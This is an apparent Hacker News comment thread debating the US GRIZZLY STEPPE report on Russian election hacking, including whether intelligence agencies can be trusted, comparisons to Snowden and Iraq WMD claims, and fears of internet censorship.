Incredibly late, but I noted that the community is not unified, some of it is just about getting their candidate. Additionally, some of Trump's proposals mean a lot more cash/power for intelligence agencies, things like harsher standards on immigrants and more control over the internet.

If the 1 hypothesis were true, then the conspirator would be betting there will be no "incoming administration", not very soon, i'd say.

If the 2 were true, there would be also some conspiration to keep those important infomations classified.

Also, I can't help thinking about Snowden and the blown whistle of the NSA spying scheme.

Snowden is a powerful trump card for dismissive claims like "massive conspiracy in which the leaders of practically the entirety of the US military/intelligence community are willing to go on record with a hoax" thaat used to work so well.

We know our security agencies (and high level politicians) are not just dishonest, but actively violating the constitution. That people still mock those who distrust these agencies is so strange.

It's not that I don't think they would lie about anything, it's that I don't think they would lie about something this trivial and small. The NSA lied about the multi-year global surveillance program which serves their core mission, so that means that the NSA and also the FBI and DHS will lie about a relatively minor news story? How is this even in their interests?

I'm more than willing to believe they're lying but I need something. Some evidence, a credible motive, a plausible story. You can't just say, "Well the FBI says so, and they lie all the time, so we can be sure it isn't so." That's the road that leads to disbelieving the moon landing.

You don't think they might be a bit concerned a loose cannon like Trump might be a little more curious than normal candidates what sorts of interesting things they get up to, and where they spend their significant budgets?

> but I need something

That's how a lot of people feel about this whole "Russians rigged the election" thing, we'd like some evidence a little more substantial than "trust us", or at least we'd like to hear those words from someone we can trust, although no names come to mind. I can't think of very many public figures that I would trust these days.

...they might be a bit concerned a loose cannon like Trump might be a little more curious than normal candidates what sorts of interesting things they get up to, and where they spend their significant budgets?

It is perhaps significant that the "further analysis" leakfest started after Trump had already disappointed the spooks by bagging their special briefings, rather than back when all of the actual underlying facts were publicized well before election day. They always think they've got a thick enough profile of the incoming executive to bend him as far as they want. For example, Obama never closed their favorite EST Caribbean vacation-and-torture resort, even though doing so was a major campaign plank the first time around. Who knows what incriminating documents proved so persuasive? Maybe this time we've somehow elected someone who won't be in their pocket from Day One?

Ya, who knows....I do think he is very different than your typical politician, but exactly how no one really knows. You might be right that they thought they had the goods on him with things like the sex talk tape, but when he basically shrugs his shoulders and it slides right off his back, I could see how that might be worrying to someone who is also in the influence game.

I agree on Obama, I think something must happen in the first few days where the new President is sat down and gets told how things really work. I would think that is what happened to many of Obama's promises. I doubt anyone would look forward to having that talk with Donald Trump.

With option 1, it will be hard for the new administration to unravel it without confirming the bias that they are in the pay of Russia. However this level of subtlety may be beyond Trump.

Perhaps Obama is trying to make Trump's new administration look illegitimate?

Option 1's problem is far less anyone in the new administration is in the pay of Russia, but that the GOP for more than a decade has been claiming government is totally incompetent, cannot be trusted to do anything, should not be trusted, and could not investigate itself. This is hardly any different than the surveillance state, creating that infrastructure puts it right into the hands of political adversaries when the political winds change, and now creating distrust in government generally rather than just political enemies means the distrust is inherited when political winds change. It's deeply damaging to have this concept of "saying things makes them true/untrue" rather than appeal to facts.

> presented it as evidence

Quite predictable, since they also considered the wild accusations of various politicians of a high level Russian conspiracy to be evidence.

If you rephrase your hysterical wording as "major bipartisan concern across every intelligence agency and nearly all ranking members of both houses of Congress, including the heads of both Intelligence Committees," then I'm not really sure what more evidence you or I could hope for from such an obviously sensitive, active topic for the time being.

By mentioning that they are "ranking members" you make an argument from authority that is predicated on the legitimacy of the government alone, effectively saying "kneel and take whatever they say at face value".

In my view, they are all self-serving career politicians and none have shown any particular reason they should be trusted or respected. They were the ones who urged the knee-jerk reaction in Iraq which has cost trillions of dollars and many lives, among many other bad decisions that they all agree on.

Fine. But (assuming you extend this attitude to "the mainstream media" as well) you've created for yourself an ontology of the world in which it is impossible to claim any knowledge of anything outside your direct field of view. I'm not really sure how you intend us to accomplish much of anything without _some_ ability to trust _someone_ else. And bipartisan agreement from bitter enemies who have little or nothing to gain personally from such statements is about the lowest bar of trust I can imagine.

Politicians stand to gain government expansion when they scare the population.

So it's not nearly as low of a bar as you think. It's like you're claiming we must trust pharmaceutical representatives from competing companies when they both agree that we all need more pills.

Who's expanding what part of government here?

Every Democrat and most Republicans?

The issue is not so much authority, the issue is urgency.

Why is there urgency to rush to judgment about alleged Russian election meddling?

If it happened, then unless anyone thinks the outcome of the election should be reversed, we have four years to get to the bottom of it, take action, and prevent it from happening again.

It's very much reminiscent of the blind urgency to invade Iraq on shaky evidence. Note that one tactic used to get people to act is to create urgency. The simplest example is "this offer expires in 5 minutes..."

It's not so much that I give no credit to any officials as having authority, it's that they all agree on the knee-jerk urgency when there is no apparent need to do so, and none feel obligated to offer a point by point probability assessment of whatever information, inference, or intelligence has them 100% convinced, since the information disclosed so far paints a vague, circumstantial picture.

This sort of elitist disregard for the basic rationality of the public is not something I can stomach, so I simply can't take their assurances at face value.

That's not what "ranking members" communicates; rather, it suggests that the conclusion transcends partisan politics. That doesn't mean it doesn't succumb to other biases (though I don't think so), but it is a meaningful statement to make.

I think there is a coalition of peculiarly anti-Russian hawks who have been the most vocal in their opposition to Russia's behavior in Crimea, etc.

This likely transcends party lines in the same way that support for wall street or the oil industry transcends party lines.

So, that's what I'm saying: that the "ranking members" support the conclusion doesn't dispose of all bias, but it does dispose of the Trump vs. Clinton bias. It's up to you how to weight [Trump vs. Clinton] vs. [Russia vs. US].

But my impression is that [Trump vs. Clinton] is way more powerful than any other bias right now.

> But my impression is that [Trump vs. Clinton] is way more powerful than any other bias right now.

I think this is correct, and largely why the Russia meddling has become more an article of faith than a highly concerning possibility.

Was it any different with Iraq WMD?

Yes. Many, many parts of the intelligence community produced reports contradicting any claims of WMD evidence, and were summarily ignored by a very not-bipartisan administration. There is basically total consensus among every intelligence agency that the evidence points to Russia.

Not just ignored, but specifically worked around.


Basic sources on the total consensus?


> The U.S. Intelligence Community (USIC) is confident that the Russian Government directed the recent compromises of e-mails from US persons and institutions, including from US political organizations.

This is an official joint statement from the USIC, which is an official body composed of 16 different intelligence organizations:


That report presents no evidence, comes from political appointees, and generally only says that it might be consistent with something Russia would like to do without explaining why.

Also, not sure how the agency count helps anything. Exactly what did agencies like the NRO and Coast Guard contribute here?

My understanding was that they had agreed on the likely Russian origin of at least one system from which emails were obtained, but that they had disagreed on the motivation for the leaks.

The funny part about all of this to me, is that if most companies with data to lose aren't already taking these recommendations.. then they've already been cracked.

Most of this report is pretty simple social engineering tactics/table stakes.

Not only many of these comments, but a few commenters jumping on the thread within minutes trying to repeatedly question or throw shade on Russia's role in this.

well I suppose their phones will work really well from now on wink

Agreed - this is meant to present the evidence or at least the public part of.

If this is all there is; then the skepticism coming from the incoming administration is warranted.

You said "Agreed" then said the exact opposite of what the parent said.

> the point of this report is not to justify the punitive actions taken today.

You mean the point of the persons who wrote it? Probably not.

But the intent of those who decided to release it today? It most likely was. If so many HN commenters--sophisticated computer users and people with cognitive abilities way above average--feel like it doesn't go without saying, how many CNN or Fox News will realise it doesn't make the case against Russian?

They'll just remember that some documents were released by some US intel agencies, proving that the Russians did "it" (without even a clear idea of what "it" might be), while the US govt punished them. That's good enough for people who saw no problem with going to war against Iraq because of 9/11.

What worries me is that all of this Russian hackers + Fake News agitprop is that it looks like a perfect prelude to justify Internet censorship in Western democracies. When Internet allowed Obama to "steal" the Democratic party from Clinton in 2008, it was OK: maybe a bit embarrassing, but his policies weren't really that different from hers. But in 2016, with Sanders almost stealing the party again, and Trump taking the GOP then the general election by storm, politicians and their sponsors realised they didn't effectively influence voters through mainstream media any more. They've finally realised how scared they should be of Internet, and they'll want to "civilise" it, i.e. make it as controllable as billionaire-owned TV channels and newspaper. I hope they'll fail, but some of them will try to.

The report itself seems to claim it provides attribution. Am I misunderstanding?

> Previous JARs have not attributed malicious cyber activity to specific countries or threat actors. However, public attribution of these activities to RIS is supported by technical indicators from the U.S. Intelligence Community, DHS, FBI, the private sector, and other entities. This determination expands upon the Joint Statement released October 7, 2016, from the Department of Homeland Security and the Director of National Intelligence on Election Security.

The report is literally titled: "GRIZZLY STEPPE – Russian Malicious Cyber Activity"

Yet it doesn't actually make a case for Russian Malicious Cyber Activity. People are pointing out the obvious spin on this especially since it's extremely light on technical details or a reason to exist other than propaganda. Reasonable companies don't need to be taught about phishing attacks.

Guidelines | FAQ | Support | API | Security | Lists | Bookmarklet | Legal | Apply to YC | Contact